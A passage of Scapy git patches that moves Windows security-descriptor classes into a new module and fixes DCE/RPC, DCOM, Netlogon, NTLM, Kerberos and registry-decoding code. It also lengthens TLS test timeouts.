"CLAIM_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY", + 0x0008: "CLAIM_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT", + 0x0010: "CLAIM_SECURITY_ATTRIBUTE_DISABLED", + 0x0020: "CLAIM_SECURITY_ATTRIBUTE_MANDATORY", + }, + ), + LEIntField("ValueCount", 0), + FieldListField( + "ValueOffsets", [], LEIntField("", 0), count_from=lambda pkt: pkt.ValueCount + ), + _NTLMPayloadField( + "Data", + lambda pkt: 16 + pkt.ValueCount * 4, + [ + ConditionalField( + StrFieldUtf16("Name", b""), + lambda pkt: pkt.NameOffset, + ), + # TODO: Values + ], + offset_name="Offset", + ), + ] + + +# [MS-DTYP] sect 2.4.4.15 + + +class WINNT_SYSTEM_RESOURCE_ATTRIBUTE_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + [ + PacketField( + "AttributeData", + CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1(), + CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1, + ) + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_RESOURCE_ATTRIBUTE_ACE, AceType=0x12) + +# [MS-DTYP] sect 2.4.4.16 + + +class WINNT_SYSTEM_SCOPED_POLICY_ID_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_SCOPED_POLICY_ID_ACE, AceType=0x13) + +# [MS-DTYP] sect 2.4.5 + + +class WINNT_ACL(Packet): + fields_desc = [ + ByteField("AclRevision", 2), + ByteField("Sbz1", 0x00), + # Total size including header: + # AclRevision(1) + Sbz1(1) + AclSize(2) + AceCount(2) + Sbz2(2) + FieldLenField( + "AclSize", + None, + length_of="Aces", + adjust=lambda _, x: x + 8, + fmt=" bytes + return ( + _NTLM_post_build( + self, + pkt, + self.OFFSET, + { + "OwnerSid": 4, + "GroupSid": 8, + "SACL": 12, + "DACL": 16, + }, + config=[ + ("Offset", _NTLM_ENUM.OFFSET), + ], + ) + + pay + ) + + def show_print(self): + """ + Print the SECURITY_DESCRIPTOR in a human format + """ + print("Owner:", self.OwnerSid.summary()) + print("Group:", self.GroupSid.summary()) + if getattr(self, "DACL", None): + print("DACL:") + for ace in self.DACL.Aces: + print(" - ", ace.toSDDL()) + if getattr(self, "SACL", None): + print("SACL:") + for ace in self.SACL.Aces: + print(" - ", ace.toSDDL()) diff --git a/scapy/modules/ldaphero.py b/scapy/modules/ldaphero.py index 8e70095922d..8842cf3b593 100644 --- a/scapy/modules/ldaphero.py +++ b/scapy/modules/ldaphero.py @@ -43,7 +43,7 @@ from scapy.layers.ntlm import NTLMSSP from scapy.layers.kerberos import KerberosSSP from scapy.layers.spnego import SPNEGOSSP -from scapy.layers.smb2 import ( +from scapy.layers.windows.security import ( SECURITY_DESCRIPTOR, WELL_KNOWN_SIDS, WINNT_ACE_FLAGS, diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index 93755d9198b..16716ae0637 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -98,7 +98,7 @@ USER_SESSION_KEY, CLAIM_ENTRY_sub2, ) -from scapy.layers.smb2 import ( +from scapy.layers.windows.security import ( WINNT_SID, WINNT_SID_IDENTIFIER_AUTHORITY, ) diff --git a/test/scapy/layers/msrpce/mslsad.uts b/test/scapy/layers/msrpce/mslsad.uts index 219907ceaca..e997381ca75 100644 --- a/test/scapy/layers/msrpce/mslsad.uts +++ b/test/scapy/layers/msrpce/mslsad.uts @@ -27,7 +27,7 @@ assert bytes(pkt) == b'\x00\x00\x00\x00\x92\xa1*"\xc2\xc2\nJ\xaf\x0bL\xdd]C\x8c\ = [MS-LSAD] - Dissect LsarEnumerateAccountsWithUserRight_Response -from scapy.layers.smb2 import WINNT_SID +from scapy.layers.windows.security import WINNT_SID pkt = LsarEnumerateAccountsWithUserRight_Response(b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\t\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00*\x02\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00 \x02\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00') information = pkt.valueof("EnumerationBuffer.Information") diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index 2e05b8357d2..c882a2e27b5 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -551,6 +551,8 @@ assert not set_info.Data.ReplaceIfExists = SMB2 - Build and dissect SECURITY_DESCRIPTOR +from scapy.layers.windows.security import * + sd = SECURITY_DESCRIPTOR( Control="DACL_PRESENT+DACL_PROTECTED+SELF_RELATIVE", OwnerSid=WINNT_SID.fromstr("S-1-1-0"), diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index 5f1885e9d06..7a552e3c779 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -102,7 +102,7 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= def wait_tls_test_server_online(): t = time.time() while True: - if time.time() - t > 1: + if time.time() - t > 3: raise RuntimeError("Server socket failed to start in time") try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -116,6 +116,7 @@ def wait_tls_test_server_online(): s.close() except: pass + time.sleep(0.1) continue @@ -176,7 +177,11 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=No atmtsrv = q_.get(timeout=5) if not atmtsrv: raise RuntimeError("Server hanged on startup") - wait_tls_test_server_online() + try: + wait_tls_test_server_online() + except Exception as ex: + atmtsrv.stop() + raise ex print("Thread synchronised") # Run openssl client run_openssl_client(msg, suite=suite, version=version, tls13=tls13, client_auth=client_auth, psk=psk) @@ -297,7 +302,11 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, atmtsrv = q_.get(timeout=5) if not atmtsrv: raise RuntimeError("Server hanged on startup") - wait_tls_test_server_online() + try: + wait_tls_test_server_online() + except Exception as ex: + atmtsrv.stop() + raise ex print("Thread synchronised") # Run client if sess_in_out: From 9802dca4186c1e84494bb33b33a8e6c5e91a08ba Mon Sep 17 00:00:00 2001 From: Ebrix <8287617+Ebrix@users.noreply.github.com> Date: Thu, 5 Mar 2026 04:47:31 +0100 Subject: [PATCH 1608/1632] Fix bugs: reg_value to reg_name, multi_sz decoding --- scapy/layers/windows/registry.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/layers/windows/registry.py b/scapy/layers/windows/registry.py index edf26b11ec0..640f09829cd 100644 --- a/scapy/layers/windows/registry.py +++ b/scapy/layers/windows/registry.py @@ -250,7 +250,7 @@ def frombytes(reg_name: str, reg_type: RegType, data: bytes): """ if reg_type == RegType.REG_MULTI_SZ: # encode to multiple null terminated strings - reg_data = [x.decode("utf-16le") for x in data.split(b"\x00\x00")[:-1]] + reg_data = data.decode("utf-16le")[:-2].split("\x00") elif reg_type in [ RegType.REG_SZ, RegType.REG_EXPAND_SZ, @@ -311,13 +311,13 @@ def fromstr(reg_name: str, reg_type: RegType, data: str): def __str__(self) -> str: return ( - f"{self.reg_value} ({self.reg_type.name}: " + f"{self.reg_name} ({self.reg_type.name}: " + f"{self.reg_type.real_value if self.reg_type == RegType.UNK else self.reg_type.value}" # noqa E501 + f") {self.reg_data}" ) def __repr__(self) -> str: - return f"RegEntry({self.reg_value}, {self.reg_type}, {self.reg_data})" + return f"RegEntry({self.reg_name}, {self.reg_type}, {self.reg_data})" def __eq__(self, value): return isinstance(value, RegEntry) and all( From dbaaf69802570af278e92589686c62b153ed1187 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Wed, 11 Mar 2026 15:49:25 +0100 Subject: [PATCH 1609/1632] DCE/RPC: various fixes --- doc/scapy/layers/dcerpc.rst | 2 +- scapy/layers/dcerpc.py | 19 +++++++--- scapy/layers/ms_nrtp.py | 2 +- scapy/layers/msrpce/msdcom.py | 63 +++++++++++++++++++++++++++++--- scapy/layers/msrpce/msnrpc.py | 7 ++-- scapy/layers/msrpce/rpcclient.py | 56 ++++++++++++++++++++-------- scapy/layers/msrpce/rpcserver.py | 2 +- scapy/layers/ntlm.py | 7 ++++ 8 files changed, 124 insertions(+), 34 deletions(-) diff --git a/doc/scapy/layers/dcerpc.rst b/doc/scapy/layers/dcerpc.rst index 068eac1d8ef..c2e4290756a 100644 --- a/doc/scapy/layers/dcerpc.rst +++ b/doc/scapy/layers/dcerpc.rst @@ -313,7 +313,7 @@ There are extensions to the :class:`~scapy.layers.msrpce.rpcclient.DCERPC_Client client.negotiate_sessionkey(bytes.fromhex("77777777777777777777777777777777")) client.close() -- the :class:`~scapy.layers.msrpce.msdcom.DCOM_Client` (unfinished) +- the :class:`~scapy.layers.msrpce.msdcom.DCOM_Client`. More details are available in `DCOM `_ Server ------ diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index efa7e8e676b..20a2d1d5376 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -180,6 +180,8 @@ } DCE_RPC_INTERFACES_NAMES = {} DCE_RPC_INTERFACES_NAMES_rev = {} +COM_INTERFACES_NAMES = {} +COM_INTERFACES_NAMES_rev = {} class DCERPC_Transport(IntEnum): @@ -1350,6 +1352,8 @@ def register_com_interface(name, uuid, opnums): # bind for build for opnum, operations in opnums.items(): bind_top_down(DceRpc5Request, operations.request, opnum=opnum) + COM_INTERFACES_NAMES[uuid] = name + COM_INTERFACES_NAMES_rev[name.lower()] = uuid def find_com_interface(name) -> ComInterface: @@ -2824,6 +2828,7 @@ def __init__(self, *args, **kwargs): self.sent_cont_ids = [] self.cont_id = 0 # Currently selected context self.auth_context_id = 0 # Currently selected authentication context + self.assoc_group_id = 0 # Currently selected association group self.map_callid_opnum = {} self.frags = collections.defaultdict(lambda: b"") self.sniffsspcontexts = {} # Unfinished contexts for passive @@ -2869,6 +2874,8 @@ def _up_pkt(self, pkt): finally: self.sent_cont_ids = [] + self.assoc_group_id = pkt.assoc_group_id + # Endianness self.ndrendian = {0: "big", 1: "little"}[pkt[DceRpc5].endian] @@ -2878,18 +2885,20 @@ def _up_pkt(self, pkt): elif DceRpc5Request in pkt: # request => match opnum with callID opnum = pkt.opnum + uid = (self.assoc_group_id, pkt.call_id) if self.rpc_bind_is_com: - self.map_callid_opnum[pkt.call_id] = ( + self.map_callid_opnum[uid] = ( opnum, pkt[DceRpc5Request].payload.payload, ) else: - self.map_callid_opnum[pkt.call_id] = opnum, pkt[DceRpc5Request].payload + self.map_callid_opnum[uid] = opnum, pkt[DceRpc5Request].payload elif DceRpc5Response in pkt: # response => get opnum from table + uid = (self.assoc_group_id, pkt.call_id) try: - opnum, opts["request_packet"] = self.map_callid_opnum[pkt.call_id] - del self.map_callid_opnum[pkt.call_id] + opnum, opts["request_packet"] = self.map_callid_opnum[uid] + del self.map_callid_opnum[uid] except KeyError: log_runtime.info("Unknown call_id %s in DCE/RPC session" % pkt.call_id) # Bind / Alter request/response specific @@ -2912,7 +2921,7 @@ def _defragment(self, pkt, body=None): """ Function to defragment DCE/RPC packets. """ - uid = pkt.call_id + uid = (self.assoc_group_id, pkt.call_id) if pkt.pfc_flags.PFC_FIRST_FRAG and pkt.pfc_flags.PFC_LAST_FRAG: # Not fragmented return body diff --git a/scapy/layers/ms_nrtp.py b/scapy/layers/ms_nrtp.py index d97abb18e77..2af3c6b1d05 100644 --- a/scapy/layers/ms_nrtp.py +++ b/scapy/layers/ms_nrtp.py @@ -712,7 +712,7 @@ def _member_type_infos_cb(pkt, lst, cur, remain): except StopIteration: return None typeEnum = BinaryTypeEnum(typeEnum) - # Return BinaryTypeEnum tainted with a pre-selected type. + # Return BinaryTypeEnum tainted with a preselected type. return functools.partial( NRBFAdditionalInfo, bintype=typeEnum, diff --git a/scapy/layers/msrpce/msdcom.py b/scapy/layers/msrpce/msdcom.py index a6cadfe5008..d60bc7ed834 100644 --- a/scapy/layers/msrpce/msdcom.py +++ b/scapy/layers/msrpce/msdcom.py @@ -30,6 +30,7 @@ PadField, StrLenField, StrNullFieldUtf16, + UUIDEnumField, UUIDField, XShortField, XStrFixedLenField, @@ -37,6 +38,8 @@ from scapy.volatile import RandUUID from scapy.layers.dcerpc import ( + COM_INTERFACES_NAMES_rev, + COM_INTERFACES_NAMES, ComInterface, DCE_C_AUTHN_LEVEL, DCE_RPC_PROTOCOL_IDENTIFIERS, @@ -60,6 +63,7 @@ NDRShortField, NDRSignedIntField, RPC_C_AUTHN, + RPC_C_IMP_LEVEL, ) from scapy.utils import valid_ip6, valid_ip from scapy.layers.msrpce.rpcclient import DCERPC_Client, DCERPC_Transport @@ -445,7 +449,15 @@ class OBJREF(Packet): fields_desc = [ XStrFixedLenField("signature", b"MEOW", length=4), # :3 LEIntField("flags", 0x04), - UUIDField("iid", IID_IActivationPropertiesIn, uuid_fmt=UUIDField.FORMAT_LE), + UUIDEnumField( + "iid", + IID_IActivationPropertiesIn, + ( + COM_INTERFACES_NAMES.get, + lambda x: COM_INTERFACES_NAMES_rev.get(x.lower()), + ), + uuid_fmt=UUIDField.FORMAT_LE, + ), ] @@ -735,6 +747,7 @@ class OXID_Entry: def __init__(self): self.oxid: Optional[int] = None self.bindingInfo: Optional[Tuple[str, int]] = None + self.target_name: str = None self.authnHint: DCE_C_AUTHN_LEVEL = DCE_C_AUTHN_LEVEL.CONNECT self.version: Optional[COMVERSION] = None self.ipid_IRemUnknown: Optional[uuid.UUID] = None @@ -777,6 +790,7 @@ def sr1_req( iface: ComInterface, ssp=None, auth_level=None, + impersonation_type=None, timeout=None, **kwargs, ): @@ -788,6 +802,7 @@ def sr1_req( :param ssp: (optional) non default SSP to use to connect to the object exporter :param auth_level: (optional) non default authn level to use + :param impersonation_type: (optional) non default impersonation type to use :param timeout: (optional) timeout for the connection """ # Look for this object's entry @@ -817,6 +832,7 @@ def sr1_req( pkt=pkt, ssp=ssp, auth_level=auth_level, + impersonation_type=impersonation_type, timeout=timeout, **kwargs, ) @@ -858,6 +874,12 @@ def __init__(self, cid: GUID = None, verb=True, **kwargs): if "auth_level" not in kwargs and "ssp" in kwargs: kwargs["auth_level"] = DCE_C_AUTHN_LEVEL.PKT_INTEGRITY + # DCOM_Client handles the activations. + # [MS-RPCE] sect 3.2.4.1.1.2 : "it MUST specify a default impersonation + # level of at leastRPC_C_IMPL_LEVEL_IMPERSONATE" + if "impersonation_type" not in kwargs and "ssp" in kwargs: + kwargs["impersonation_type"] = RPC_C_IMP_LEVEL.IMPERSONATE + super(DCOM_Client, self).__init__( DCERPC_Transport.NCACN_IP_TCP, ndr64=False, @@ -908,7 +930,10 @@ def _RemoteCreateInstanceOrGetClassObject( raise ValueError("Must specify at least one interface !") # Bind IObjectExporter if not already - self.bind_or_alter(find_dcerpc_interface("IRemoteSCMActivator")) + self.bind_or_alter( + find_dcerpc_interface("IRemoteSCMActivator"), + target_name="rpcss/" + self.host, + ) # [MS-DCOM] sect 3.1.2.5.2.3.3 - Issuing the Activation Request @@ -1034,8 +1059,9 @@ def _RemoteCreateInstanceOrGetClassObject( ) # Set RPC bindings from the activation request - binds, _ = _ParseStringArray(remoteReply.valueof("pdsaOxidBindings")) + binds, secs = _ParseStringArray(remoteReply.valueof("pdsaOxidBindings")) entry.bindingInfo = self._ChoseRPCBinding(binds) + entry.target_name = self._CalculateTargetName(secs) if PropsOutInfo in prop: # Information about the interfaces that the client requested @@ -1225,6 +1251,21 @@ def _ChoseRPCBinding(self, bindings: List[STRINGBINDING]): return host, port raise ValueError("No valid bindings available !") + def _CalculateTargetName(self, secs: List[SECURITYBINDING]): + """ + 3.2.4.2 ORPC Invocations - Find SPN from aPrincName + """ + if self.ssp is None or not secs: + return None + + for sec in secs: + # "if the aPrincName field is nonempty" + if sec.wAuthnSvc == self.ssp.auth_type and sec.aPrincName: + return sec.aPrincName + + # "if the aPrincName field is empty, the client MUST NOT specify an SPN" + return None + def UnmarshallObjectReference( self, mifaceptr: MInterfacePointer, iid: ComInterface ): @@ -1261,7 +1302,10 @@ def ResolveOxid2( client.connect(host, port=port) # Bind IObjectExporter if not already - client.bind_or_alter(find_dcerpc_interface("IObjectExporter")) + client.bind_or_alter( + find_dcerpc_interface("IObjectExporter"), + target_name="rpcss/" + self.host, + ) try: # Perform ResolveOxid2 @@ -1293,8 +1337,9 @@ def ResolveOxid2( ) # Set RPC bindings from the oxid request - binds, _ = _ParseStringArray(resp.valueof("ppdsaOxidBindings")) + binds, secs = _ParseStringArray(resp.valueof("ppdsaOxidBindings")) entry.bindingInfo = self._ChoseRPCBinding(binds) + entry.target_name = self._CalculateTargetName(secs) # Update the OXID table if entry.oxid not in self.OXID_table: @@ -1342,6 +1387,7 @@ def sr1_orpc_req( ipid: uuid.UUID, ssp=None, auth_level=None, + impersonation_type=None, timeout=5, **kwargs, ): @@ -1353,6 +1399,7 @@ def sr1_orpc_req( :param ssp: (optional) non default SSP to use to connect to the object exporter :param auth_level: (optional) non default authn level to use + :param impersonation_type: (optional) non default impersonation type to use :param timeout: (optional) timeout for the connection """ # [MS-DCOM] sect 3.2.4.2 @@ -1385,6 +1432,7 @@ def sr1_orpc_req( DCERPC_Transport.NCACN_IP_TCP, ssp=ssp or self.ssp, auth_level=auth_level or oxid_entry.authnHint, + impersonation_type=impersonation_type or self.impersonation_type, verb=self.verb, ) @@ -1395,7 +1443,10 @@ def sr1_orpc_req( ) # Bind the COM interface - resolver_entry.client.bind_or_alter(ipid_entry.iface) + resolver_entry.client.bind_or_alter( + ipid_entry.iface, + target_name=oxid_entry.target_name, + ) # We need to set the NDR very late, after the bind pkt.ndr64 = resolver_entry.client.ndr64 diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index 20e2355c18c..1b47623e6ad 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -51,7 +51,6 @@ PNETLOGON_CREDENTIAL, ) - if conf.crypto_valid: from cryptography.hazmat.primitives import hashes, hmac from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes @@ -71,7 +70,6 @@ Optional, ) - # --- RFC # [MS-NRPC] sect 3.1.4.2 @@ -853,11 +851,12 @@ def establish_secure_channel( else: self.ssp = self.sock.session.ssp = KerberosSSP( UPN=UPN, - SPN="netlogon/" + DC_FQDN, PASSWORD=PASSWORD, KEY=KEY, ) - if not self.bind_or_alter(self.interface): + # [MS-NRPC] note <185> "Windows uses netlogon/" + target_name = "netlogon/" + DC_FQDN + if not self.bind_or_alter(self.interface, target_name=target_name): raise ValueError("Bind failed !") # Send AuthenticateKerberos request diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 2e0454340a5..5f40ddec50e 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -7,6 +7,7 @@ DCE/RPC client as per [MS-RPCE] """ +import collections import uuid import socket @@ -101,7 +102,7 @@ def __init__( ), "transport must be from DCERPC_Transport" # Counters - self.call_id = 0 + self.call_ids = collections.defaultdict(lambda: 0) # by assoc_group_id self.next_cont_id = 0 # next available context id self.next_auth_contex_id = 0 # next available auth context id @@ -271,10 +272,10 @@ def sr1(self, pkt, **kwargs): The DCE/RPC header is added automatically. """ - self.call_id += 1 + self.call_ids[self.session.assoc_group_id] += 1 pkt = ( DceRpc5( - call_id=self.call_id, + call_id=self.call_ids[self.session.assoc_group_id], pfc_flags="PFC_FIRST_FRAG+PFC_LAST_FRAG", endian=self.ndrendian, auth_verifier=kwargs.pop("auth_verifier", None), @@ -295,10 +296,10 @@ def send(self, pkt, **kwargs): The DCE/RPC header is added automatically. """ - self.call_id += 1 + self.call_ids[self.session.assoc_group_id] += 1 pkt = ( DceRpc5( - call_id=self.call_id, + call_id=self.call_ids[self.session.assoc_group_id], pfc_flags="PFC_FIRST_FRAG+PFC_LAST_FRAG", endian=self.ndrendian, auth_verifier=kwargs.pop("auth_verifier", None), @@ -346,6 +347,7 @@ def sr1_req(self, pkt, **kwargs): DceRpcSecVTCommand(SEC_VT_COMMAND_END=1) / DceRpcSecVTPcontext( InterfaceId=self.session.rpc_bind_interface.uuid, + Version=self.session.rpc_bind_interface.if_version, TransferSyntax="NDR64" if self.ndr64 else "NDR 2.0", TransferVersion=1 if self.ndr64 else 2, ) @@ -501,6 +503,7 @@ def _bind( interface: Union[DceRpcInterface, ComInterface], reqcls, respcls, + target_name: Optional[str] = None, ) -> bool: """ Internal: used to send a bind/alter request @@ -559,7 +562,7 @@ def _bind( else 0 ) ), - target_name="host/" + self.host, + target_name=target_name or ("host/" + self.host), ) if status not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: @@ -601,7 +604,7 @@ def _bind( self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, input_token=resp.auth_verifier.auth_value, - target_name="host/" + self.host, + target_name=target_name or ("host/" + self.host), ) if status in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: @@ -644,7 +647,7 @@ def _bind( self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, input_token=resp.auth_verifier.auth_value, - target_name="host/" + self.host, + target_name=target_name or ("host/" + self.host), ) else: log_runtime.error("GSS_Init_sec_context failed with %s !" % status) @@ -655,7 +658,6 @@ def _bind( and respcls in resp and self._check_bind_context(interface, resp.results) ): - self.call_id = 0 # reset call id port = resp.sec_addr.port_spec.decode() ndr = self.session.ndr64 and "NDR64" or "NDR32" self.ndr64 = self.session.ndr64 @@ -704,23 +706,45 @@ def _bind( resp.show() return False - def bind(self, interface: Union[DceRpcInterface, ComInterface]) -> bool: + def bind( + self, + interface: Union[DceRpcInterface, ComInterface], + target_name: Optional[str] = None, + ) -> bool: """ Bind the client to an interface :param interface: the DceRpcInterface object """ - return self._bind(interface, DceRpc5Bind, DceRpc5BindAck) + return self._bind( + interface, + DceRpc5Bind, + DceRpc5BindAck, + target_name=target_name, + ) - def alter_context(self, interface: Union[DceRpcInterface, ComInterface]) -> bool: + def alter_context( + self, + interface: Union[DceRpcInterface, ComInterface], + target_name: Optional[str] = None, + ) -> bool: """ Alter context: post-bind context negotiation :param interface: the DceRpcInterface object """ - return self._bind(interface, DceRpc5AlterContext, DceRpc5AlterContextResp) + return self._bind( + interface, + DceRpc5AlterContext, + DceRpc5AlterContextResp, + target_name=target_name, + ) - def bind_or_alter(self, interface: Union[DceRpcInterface, ComInterface]) -> bool: + def bind_or_alter( + self, + interface: Union[DceRpcInterface, ComInterface], + target_name: Optional[str] = None, + ) -> bool: """ Bind the client to an interface or alter the context if already bound @@ -728,10 +752,10 @@ def bind_or_alter(self, interface: Union[DceRpcInterface, ComInterface]) -> bool """ if not self.session.rpc_bind_interface: # No interface is bound - return self.bind(interface) + return self.bind(interface, target_name=target_name) elif self.session.rpc_bind_interface != interface: # An interface is already bound - return self.alter_context(interface) + return self.alter_context(interface, target_name=target_name) return True def open_smbpipe(self, name: str): diff --git a/scapy/layers/msrpce/rpcserver.py b/scapy/layers/msrpce/rpcserver.py index 0569a5304bb..8b65164c2cc 100644 --- a/scapy/layers/msrpce/rpcserver.py +++ b/scapy/layers/msrpce/rpcserver.py @@ -388,7 +388,7 @@ def recv(self, data): self.session.out_pkt( hdr / cls( - assoc_group_id=RandShort(), + assoc_group_id=int(RandShort()), sec_addr=DceRpc5PortAny( port_spec=port_spec, ), diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 4e0d956be72..fbba9a24e94 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1584,6 +1584,13 @@ def GSS_Init_sec_context( if Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG else [] ) + + ( + [ + "NEGOTIATE_IDENTIFY", + ] + if Context.flags & GSS_C_FLAGS.GSS_C_IDENTIFY_FLAG + else [] + ) ), ProductMajorVersion=10, ProductMinorVersion=0, From 1f3ac50ebe5dc7e0ad4f48246b971c964a95e42a Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sat, 14 Mar 2026 18:53:06 +0100 Subject: [PATCH 1610/1632] KerberosSSP improvements, fixed for LDAP and MSNRPC (#4944) * [MS-NRPC]: authenticators for Kerberos * Kerberos: handle the LDAP case. * Improve handling of SMB_Server RPCs * MS-NRPC: add unit tests for Authenticators --- scapy/layers/dcerpc.py | 2 +- scapy/layers/gssapi.py | 13 +++ scapy/layers/kerberos.py | 40 +++++--- scapy/layers/ldap.py | 33 +++++-- scapy/layers/msrpce/msdcom.py | 6 ++ scapy/layers/msrpce/msnrpc.py | 80 ++++++++------- scapy/layers/smbserver.py | 146 ++++++++++++++++++++-------- scapy/layers/windows/erref.py | 1 + scapy/modules/ldaphero.py | 11 +-- test/scapy/layers/msrpce/msnrpc.uts | 36 +++++++ 10 files changed, 262 insertions(+), 106 deletions(-) diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 20a2d1d5376..a79b90b9ce8 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -1461,7 +1461,7 @@ def getfield_and_val(self, attr): pass raise - def valueof(self, request): + def valueof(self, request: str): """ Util to get the value of a NDRField, ignoring arrays, pointers, etc. """ diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index d14f2360f43..6f4d5e91343 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -403,6 +403,19 @@ class GSS_S_FLAGS(IntFlag): GSS_S_ALLOW_MISSING_BINDINGS = 0x10000000 +class GSS_QOP_REQ_FLAGS(IntFlag): + """ + Used for qop_flags + """ + + # Windows' API requires requesters to add an extra buffer of type + # 'SECBUFFER_PADDING' to receive the padding. The GSS_WrapEx API + # does not provide such a mechanism and always uses it. However + # some implementations like LDAP actually require NO padding, which + # therefore can't be achieved with GSS_WrapEx. + GSS_S_NO_SECBUFFER_PADDING = 0x10000000 + + class SSP: """ The general SSP class diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index a187c39fa3b..0540d17e3d4 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -128,21 +128,22 @@ from scapy.volatile import GeneralizedTime, RandNum, RandBin from scapy.layers.gssapi import ( - GSSAPI_BLOB, + _GSSAPI_OIDS, + _GSSAPI_SIGNATURE_OIDS, GSS_C_FLAGS, GSS_C_NO_CHANNEL_BINDINGS, + GSS_QOP_REQ_FLAGS, GSS_S_BAD_BINDINGS, GSS_S_BAD_MECH, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, - GSS_S_DEFECTIVE_TOKEN, GSS_S_DEFECTIVE_CREDENTIAL, + GSS_S_DEFECTIVE_TOKEN, GSS_S_FAILURE, GSS_S_FLAGS, + GSSAPI_BLOB, GssChannelBindings, SSP, - _GSSAPI_OIDS, - _GSSAPI_SIGNATURE_OIDS, ) from scapy.layers.inet import TCP, UDP from scapy.layers.smb import _NV_VERSION @@ -202,7 +203,6 @@ Union, ) - # kerberos APPLICATION @@ -4618,6 +4618,7 @@ class CONTEXT(SSP.CONTEXT): "ServerHostname", "U2U", "KrbSessionKey", # raw Key object + "ST", # the service ticket "STSessionKey", # raw ST Key object (for DCE_STYLE) "SeqNum", # for AP "SendSeqNum", # for MIC @@ -4640,6 +4641,7 @@ def __init__(self, IsAcceptor, req_flags=None): self.SendSeqNum = 0 self.RecvSeqNum = 0 self.KrbSessionKey = None + self.ST = None self.STSessionKey = None self.IsAcceptor = IsAcceptor self.UPN = None @@ -4752,7 +4754,7 @@ def GSS_VerifyMICEx(self, Context, msgs, signature): if sig != signature.root.SGN_CKSUM: raise ValueError("ERROR: Checksums don't match") - def GSS_WrapEx(self, Context, msgs, qop_req=0): + def GSS_WrapEx(self, Context, msgs, qop_req: GSS_QOP_REQ_FLAGS = 0): """ [MS-KILE] sect 3.4.5.4 @@ -4786,9 +4788,16 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): Data = b"".join(x.data for x in msgs if x.conf_req_flag) DataLen = len(Data) # 2. Add filler - # [MS-KILE] sect 3.4.5.4.1 - "For AES-SHA1 ciphers, the EC must not - # be zero" - tok.root.EC = ((-DataLen) % Context.KrbSessionKey.ep.blocksize) or 16 + if qop_req & GSS_QOP_REQ_FLAGS.GSS_S_NO_SECBUFFER_PADDING: + # Special case for compatibility with Windows API. See + # GSS_QOP_REQ_FLAGS. + tok.root.EC = 0 + else: + # [MS-KILE] sect 3.4.5.4.1 - "For AES-SHA1 ciphers, the EC must not + # be zero" + tok.root.EC = ( + (-DataLen) % Context.KrbSessionKey.ep.blocksize + ) or 16 Filler = b"\x00" * tok.root.EC Data += 